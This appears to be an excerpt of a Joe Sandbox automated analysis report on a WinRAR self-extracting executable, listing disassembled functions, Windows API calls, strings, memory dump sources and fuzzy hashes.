                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                        • API String ID: 1496594111-2013832382
                                                                                        • Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                        • Instruction ID: 1f20a0cf61f1a2ed900ce10f2bf4b256339a6ad55362259f5a4294d328ef3cad
                                                                                        • Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                        • Instruction Fuzzy Hash: 9C32FA35E09B8299EB11DF66E8801E937A4FFA4354F500236EA6D867A9FF3CD255C340
APIs
  • Part of subcall function 00007FF6FE198E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6FE198F8D
• _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FE199F75
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE19A42F
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE19A435
  • Part of subcall function 00007FF6FE1A0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6FE1A0B44), ref: 00007FF6FE1A0BE9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
• String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
• API String ID: 3629253777-3268106645
• Opcode ID: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
• Instruction ID: 38a935dc60006b9bd097c48db63c4cbded262daed61f1a1d4eb0ea9530f7754c
• Opcode Fuzzy Hash: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
• Instruction Fuzzy Hash: 1A629F22F1968295EB10DB26D4442BD7B65FBA4784F804231FA6E876E9FF3CE549C340

Control-flow Graph
[Control-flow graph of the function at 7ff6fe1b1900 not reproduced; Windows API calls reached in the graph: RaiseException, LoadLibraryExA, GetLastError, FreeLibrary, GetProcAddress]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
• String ID: H
• API String ID: 3432403771-2852464175
• Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
• Instruction ID: 4f1ade378998ee1fcaaaafe619b67ae18bb804e9013172906a4e28ec393246d7
• Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
• Instruction Fuzzy Hash: 28914C22F15B618AFB10CF66D9806AC37B5BB98B98B454436EE2D97794FF38E445C300

Control-flow Graph
[Control-flow graph of the function at 7ff6fe1af4e0 not reproduced; Windows API calls reached in the graph: ShellExecuteExW, ShowWindow, CloseHandle, GetExitCodeProcess]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
• String ID: .exe$.inf$Install$p
• API String ID: 1054546013-3607691742
• Opcode ID: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
• Instruction ID: 0ddc5047bde74e7120ae0eb628d826ebee3245187aa46fa1ab23244735e78f70
• Opcode Fuzzy Hash: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
• Instruction Fuzzy Hash: 16C17162F49A0295FB10DB67D9442792B61BFE9B84F044035EA6D87AE5FF3CE499C300

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID:
• API String ID: 3569833718-0
• Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
• Instruction ID: 9bcdc544271fbbfaf71c1924875d6759b058df915a3b9a48f7d6dd9db92b1025
• Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
• Instruction Fuzzy Hash: 37418B21F14A4286F710CF62E810BAA2BA0EBD9B98F441135FD2A87FD5DE7DE4498744

Control-flow Graph
[Control-flow graph of the function at 7ff6fe1aa440 not reproduced; Windows API calls reached in the graph: SetDlgItemTextW, EndDialog]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialogOpen
• String ID: GETPASSWORD1$Software\WinRAR SFX
• API String ID: 2300675366-1315819833
• Opcode ID: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
• Instruction ID: 7547198be0ae91e6d9f90c7cc4c3e84c0ed6080d099bfe51f907b0c43f882e80
• Opcode Fuzzy Hash: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
• Instruction Fuzzy Hash: BBB1CF62F5974285FB00DBA6D4442BD2762ABE5794F404335EA2DA7BD9FE3CE14AC300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 6469fcd7a18d79184505e1ddd466699231e2121c09bb10067de1f33c8494aa65
• Instruction ID: 9a520f9b3a5fb1afe74692457ebf1eed78ee5a8ca9caba340cf9d3859897a41f
• Opcode Fuzzy Hash: 6469fcd7a18d79184505e1ddd466699231e2121c09bb10067de1f33c8494aa65
• Instruction Fuzzy Hash: 4712B562F1C74584EB10CB66D4442AD2762EBE97A8F400232EE6D97BD9EF3CD649C300

Control-flow Graph (graph image omitted; its nodes call CreateFileW, GetLastError and SetFileTime)

APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3536497005-0
• Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
• Instruction ID: 95e3f35a4e0268eacb1fa4e67d85726d6f9719c1a6511907a696b505c57bb228
• Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
• Instruction Fuzzy Hash: 1261A166E1864185F720CB2AF54036E6BA1BBD57A8F101334EEB983AD8EF3DD059C744

Control-flow Graph (graph image omitted)

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
• String ID: Software\WinRAR SFX
• API String ID: 207320342-754673328
• Opcode ID: 8ab1c68a47c8c2e508d57e535803f187fdd9f05ec423ba246173c715412dd5f9
• Instruction ID: dad360b300e5b0ae275339332f9b7596f08e86d2b973cac42b2e4063a4c648e8
• Opcode Fuzzy Hash: 8ab1c68a47c8c2e508d57e535803f187fdd9f05ec423ba246173c715412dd5f9
• Instruction Fuzzy Hash: 20414672E04A4589EB20CF26E4546A937A5FBD8798F401635FA6D83BD8EF7CD158C700

Control-flow Graph (graph image omitted)

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
• String ID: ]
• API String ID: 3561356813-3352871620
• Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
• Instruction ID: 0e7add47ae3c0bfa1c523fd4e41ccf88122c007ab42dd1903a463563a8256375
• Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
• Instruction Fuzzy Hash: 4C114221F4968241FB74DB13A65467D5AA1AFE8FC0F080034F96D87BD9FE6DE8488600

Control-flow Graph (graph image omitted)

APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
• Instruction ID: 16ff9fe5f1bf521fb8c40e3fd0d951f33d533ea5a9dd50cd050b8fbf73d07bfc
• Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
• Instruction Fuzzy Hash: EFF0EC25E3894282FB50DB22EC95A362761BFE4B05F805535F65E81C94EF6CE549CB00

Control-flow Graph (graph image omitted)

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
• Instruction ID: b079403b025e0d9b583a1fdfa45a8c02897cbb6a57d11d9ec0998d0d3ffb9923
• Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
• Instruction Fuzzy Hash: 37014F61F18A4281FB20DB23B8107F66791AFF8B40F440131E96EC66E5FE2CE18DC640

Control-flow Graph (graph image omitted; its nodes call GetStdHandle and WriteFile)

APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
• Instruction ID: 0b65779aff5cdd9ff988742aa83038861d667f856e0248e4d44d35e8dda70c43
• Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
• Instruction Fuzzy Hash: EC51B362F1964252FB50CB26E4447BE6B90BBE5B94F541131FA2E87AD8EF7CE485C300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$TextWindow
• String ID:
• API String ID: 2912839123-0
• Opcode ID: 82d20ed81ead71c6a2595868c689d656b3dfef2fae7ade5912c5b966e821e875
• Instruction ID: 839a8a5ae1769b0ab1b18c4df19d63d16c52429dd1c40fbd5c6f73c894e64dca
• Opcode Fuzzy Hash: 82d20ed81ead71c6a2595868c689d656b3dfef2fae7ade5912c5b966e821e875
• Instruction Fuzzy Hash: F85193A2F1465284FB00DBA6D8452AD2722AFE5BA4F500635FA3D96BE5FF6CE544C300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
• Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
• Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
• Instruction ID: 4c84f2dd840be902f139ea66633cc8c6b7bc6fac056b5823674afc175e6f0144
• Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
• Instruction Fuzzy Hash: 27310621E0824282FB54EB6794513BA2A91AFE5384F440434FA6ECB7D3FE6CB849C251
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2359106489-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE19ECD8: ResetEvent.KERNEL32 ref: 00007FF6FE19ECF1
                                                                                          • Part of subcall function 00007FF6FE19ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19ED07
                                                                                        • ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19E974
                                                                                        • CloseHandle.KERNELBASE ref: 00007FF6FE19E993
                                                                                        • DeleteCriticalSection.KERNEL32 ref: 00007FF6FE19E9AA
                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6FE19E9B7
                                                                                          • Part of subcall function 00007FF6FE19EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA63
                                                                                          • Part of subcall function 00007FF6FE19EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA6E
                                                                                        Similarity
                                                                                        • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 502429940-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Thread$CreatePriority
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2610526550-3849766595
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DirectoryInitializeMallocSystem
                                                                                        • String ID: riched20.dll
                                                                                        • API String ID: 174490985-3360196438
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1A853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6FE1A856C
                                                                                          • Part of subcall function 00007FF6FE19AAE0: LoadStringW.USER32 ref: 00007FF6FE19AB67
                                                                                          • Part of subcall function 00007FF6FE19AAE0: LoadStringW.USER32 ref: 00007FF6FE19AB80
                                                                                          • Part of subcall function 00007FF6FE181FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE181FFB
                                                                                          • Part of subcall function 00007FF6FE18129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6FE181396
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1B01BB
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1B01C1
                                                                                        • SendDlgItemMessageW.USER32 ref: 00007FF6FE1B01F2
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                        • String ID:
                                                                                        • API String ID: 3106221260-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 47109696-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2371198981-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2272807158-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2176759853-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
